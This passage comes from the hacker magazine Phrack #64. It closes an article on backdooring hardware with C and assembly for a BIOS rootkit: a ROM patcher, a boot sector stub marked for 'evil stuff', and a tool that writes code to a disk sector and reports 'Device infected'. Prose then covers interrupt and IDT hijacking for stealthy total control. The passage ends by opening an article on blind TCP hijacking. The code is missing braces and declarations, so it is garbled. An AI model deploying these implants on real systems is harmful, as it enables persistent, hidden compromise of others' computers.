  size_t       	cnt;
  int		devfd;
  int		outfd;
  char *	buf;
  char *	dev;
  char *	out;
  char *	tgt;

  if (argc == 3)
      dev = BIOS_DEV;
      out = argv[2];
      sector = atoi(argv[1]);
  else if (argc == 4)
      dev = argv[1];
      out = argv[3];
      sector = atoi(argv[2]);
  if ((devfd = open(dev, O_RDONLY)) == -1)
      fprintf(stderr, "could not open BIOS\n");
  if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT)) == -1)
      fprintf(stderr, "could not open %s\n", out);
  for (cnt = 0; (ret = read(devfd, buf, BUFSIZE)) > 0; cnt += ret)
    buf = realloc(buf, ((cnt + ret) / BUFSIZE + 1) * BUFSIZE);
  if (ret == -1)
      fprintf(stderr, "error reading BIOS\n");
  if ((tgt = search(buf, cnt)) == NULL)
      fprintf(stderr, "could not find code to patch\n");
  patch(tgt, cnt, sector);
  for (i = 0; (ret = write(outfd, buf + i, cnt - i)) > 0; i += ret)
  if (ret == -1)
      fprintf(stderr, "could not write patched ROM to disk\n");
  return 0;


--[ evil.asm

;;; A sample code to be loaded by an infected BIOS instead of
;;; the real bootloader. It basically moves himself so he can
;;; load the real bootloader and jump on it. Replace the nops
;;; if you want him to do something usefull.
;;; usage is :
;;;		no usage, this code must be loaded by store.c
;;; compile with : nasm -fbin evil.asm -o evil.bin
BITS	16			
ORG	0			

;; we need this label so we can check the code size
	jmp	begin		; jump over data

;; here comes data
drive	db	0		; drive we're working on


	mov	[drive], dl	; get the drive we're working on
	;; segments init
	mov	ax, 0x07C0
	mov	ds, ax
	mov	es, ax

	;; stack init
	mov	ax, 0
	mov	ss, ax
	mov	ax, 0xffff
	mov	sp, ax

	;; move out of the zone so we can load the TRUE boot loader
	mov	ax, 0x7c0
	mov	ds, ax
	mov	ax, 0x100
	mov	es, ax
	mov	si, 0
	mov	di, 0
	mov	cx, 0x200
	rep	movsb
	;; jump to our new location
	jmp	0x100:next

next:				;; to jump to the new location
	;; load the true boot loader
	mov	dl, [drive]
	mov	ax, 0x07C0
	mov	es, ax
	mov	bx, 0
	mov	ah, 2
	mov	al, 1
	mov	ch, 0
	mov	cl, 1
	mov	dh, 0
	int	0x13

	;; do your evil stuff there (ie : infect the boot loader)
	;; execute system
	jmp 	07C0h:0

size    equ     $ - entry
%if size+2 > 512
	%error "code is too large for boot sector"

times   (512 - size - 2) db 0	; fill 512 bytes
db      0x55, 0xAA		; boot signature


--[ store.c

** code to be used to store a fake bootloader loaded by an infected BIOS
** usage is :
**		store <device to store on> <sector number> <file to inject>
** compile with : gcc store.c -o store

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define CODE_SIZE	512
#define SECTOR_SIZE	512

void	usage(char *cmd)
  fprintf(stderr, "usage is : %s <device> <sector> <code>", cmd);

int	main(int argc, char **argv)
  int	off;
  int   i;
  int   devfd;
  int	codefd;
  int   cnt; 
  char  code[CODE_SIZE];
  if (argc != 4)
  if ((devfd = open(argv[1], O_RDONLY)) == -1)
      fprintf(stderr, "error : could not open device\n");
  off = atoi(argv[2]);
  if ((codefd = open(argv[3], O_RDONLY)) == -1)
      fprintf(stderr, "error : could not open code file\n");
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = read(codefd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 
	fprintf(stderr, "error reading code\n");
  lseek(devfd, (off - 1) * SECTOR_SIZE, SEEK_SET);
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = write(devfd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 
	fprintf(stderr, "error reading code\n");
  printf("Device infected\n");
  return 0;				   


	Okay, now that we can load our code using the BIOS, time has come
to consider what we can do in this position. As we are nearly the first one
to have control over the system, we can do really interesting things.

	First, we can hijack BIOS interruptions and make them jump to
our code. This is interesting because instead of writing all the code in
the BIOS, we can now hijack BIOS routines having as much space as we need
and without having to do a lot of reverse engineering.

	Next, we can easily patch the boot loader on-thy-fly as it is our
own code which loads it. In fact, we don't even have to call the true
boot loader if we don't want to, we can make a fake one that loads a nicely
patched kernel based on the real one. Or you can make a fake boot loader
(or even patch the real one on-the-fly) that loads the real kernel and
patch it on the fly. The choice is up to you.

        Finally, I would talk about one last thing that came on my mind.
Combined with IDTR hijacking, patching the BIOS can assure us a complete
control of the system. We can patch the BIOS so that it loads our own boot
loader. This boot loader is a special one, in fact it loads a mini-OS of
our own which sets an IDT. Then, as we hijacked the IDTR register (there
are several ways to do it, the easiest being patching the target OS boot
process in order to prevent him to erase our IDT), we can then load the
true boot loader which will load the true kernel. At this time, our own os
will hijack the entire system with its own IDT proxying any interrupt you
want to, hijacking any event on the system. We even can use the system
clock as a scheduler forthe two OS : the tick will be caught by our own 
OS and depending the configuration (we can say for example 10% of the time 
for our OS and 90% for the real OS), we can execute our code or give the 
control to the real OS by jumping on its IDT.

	 You can do lot of things simply by patching the BIOS, so I suggest
you to implement your own ideas. Remember this is not so difficult,
documentation about this subject already exists and we can really do lots
of things. Just remember to use Bochs for tests before going in the wild,
it certainly isn't fun when smoke comes out of one of the motherboard's

5.  Conclusion

     So that's it, hardware can be backdoored quite easily. Of course,
what I demonstrated here was just a fast overview. We can do LOTS of things
with hardware, things that can assure us a total control of the computer
we're on and remain stealth. There is a huge work to do in this area as
more and more devices become CPU independent and implement many features
that can be used to do funny things. Imagination (and portability, sic...)
are the only limits.

   For people very interested in having fun in the hardware world, I
suggest to take a look at CPU microcode programming system
(start with the AMD K8 reverse engineering, see [18]), network cards
BIOSes and the PXE system.

(And hardware hacking can be a fun start to learn to fuck the TCPA system).

6.  References

[1] : The Art of Assembly Programming - Randall Hyde

[2] : Linux Device Drivers - Alessandro Rubini, Jonathan Corbet

[3] : OpenGL

[4] : Neon Helium Productions (NeHe)

[5] : GPGPU

[6] : HLSL tutorial

[7] : GLSL tutorial

[8] : The NVIDIA Cg Toolkit

[9] : NVIDIA Cg tutorial

[10] : nVIDIA CUDA (Compute Unified Device Architecture)

[11] : Implementing and Detecting an ACPI BIOS RootKit - John Heasman

[12] : /dev/bios - Stefan Reinauer

[13] : OpenBIOS initiative

[14] : Award BIOS reverse engineering guide - Pinczakko

[15] : Wim's BIOS

[16] : Bochs IA-32 Emulator Project

[17] : Bochs BIOS source code

[18] : Opteron Exposed: Reverse Engineering AMD K8 Microcode Updates

7.  Thanks

     Without these people, this file wouldn't be, so thanks to them :

	* Auquen, for introducing me the idea of playing with hardware five
	years ago

	* Kad and Mayhem, for convincing me to write this article

	* Sauron, for always motivating me (nothing sexual)

	* Glenux, for pointing out CUDA

	* All people present to scythale's aperos, for helping me to get
	high in such ways I can come up with evil thinking (yeah, I was
	drunk when I decided to backdoor my hardware)



           _                                                  _
          _/B\_                                              _/W\_
          (* *)              Phrack #64 file 13              (* *)
          | - |                                              | - |
          |   |      Blind TCP/IP hijacking is still alive   |   |
          |   |                                              |   |
          |   |            By lkm <>           |   |
          |   |                                              |   |
          |   |                                              |   |

--[ Contents

        1 - Introduction
        2 - Prerequisites
          2.1 - A brief reminder on TCP
          2.2 - The interest of IP ID
          2.3 - List of informations to gather

        3 - Attack description
          3.1 - Finding the client-port
          3.2 - Finding the server's SND.NEXT
          3.3 - Finding the client's SND.NEXT

        4 - Discussion
          4.1 - Vulnerable systems
          4.2 - Limitations

        5 - Conclusion

        6 - References

--[ 1 - Introduction

Fun with TCP (blind spoofing/hijacking, etc...) was very popular several
years ago when the initials TCP sequence numbers (ISN) were guessable (64K rule, 
etc...). Now that the ISNs are fairly well randomized, this stuff seems to be

In this paper we will show that it is still possible to perform blind TCP
hijacking nowadays (without attacking the PRNG responsible for generating 
the ISNs, like in [1]). We will present a method which works against a number 
of systems (Windows 2K, windows XP, and FreeBSD 4). This method is not really 
straightforward to implement, but is nonetheless entirely feasible, as we've
coded a tool which was successfully used to perform this attack against all
the vulnerable systems.

--[ 2 - Prerequisites

In this section we will give some informations that are necessary to
understand this paper.

----[ 2.1 - A brief reminder on TCP 

A TCP connection between two hosts (which will be called respectively
"client" and "server" in the rest of the paper) can be identified by a tuple
[client-IP, server-IP, client-port, server-port]. While the server port is
well known, the client port is usually in the range 1024-5000, and
automatically assigned by the operating system. (Exemple: the connection
from some guy to freenode may be represented by [,, 1207, 6667]). 

When communication occurs on a TCP connexion, the exchanged TCP packet
headers are containing these informations (actually, the IP header contains
the source/destination IP, and the TCP header contains the
source/destination port). Each TCP packet header also contains fields for a
sequence number (SEQ), and an acknowledgement number (ACK). 

Each of the two hosts involved in the connection computes a 32bits SEQ
number randomly at the establishment of the connection. This initial SEQ
number is called the ISN. Then, each time an host sends some packet with 
N bytes of data, it adds N to the SEQ number.
The sender put his current SEQ in the SEQ field of each outgoing TCP packet.
The ACK field is filled with the next *expected* SEQ number from the other
host. Each host will maintain his own next sequence number (called
SND.NEXT), and next expected SEQ number from the other host (called

Let's clarify with an exemple (for the sake of simplicity, we consider that
the connection is already established, and the ports are not shown.) 

Client						Server

[SND.NEXT=1000]					[SND.NEXT=2000]
	  --[SEQ=1000, ACK=2000, size=20]->
[SND.NEXT=1020]					[SND.NEXT=2000]
	  <-[SEQ=2000, ACK=1020, size=50]--
[SND.NEXT=1020]					[SND.NEXT=2050]	
	  --[SEQ=1020, ACK=2050, size=0]->

In the above example, first the client sends 20 bytes of data. Then, the
server acknowledges this data (ACK=1020), and send its own 50 bytes of data
in the same packet.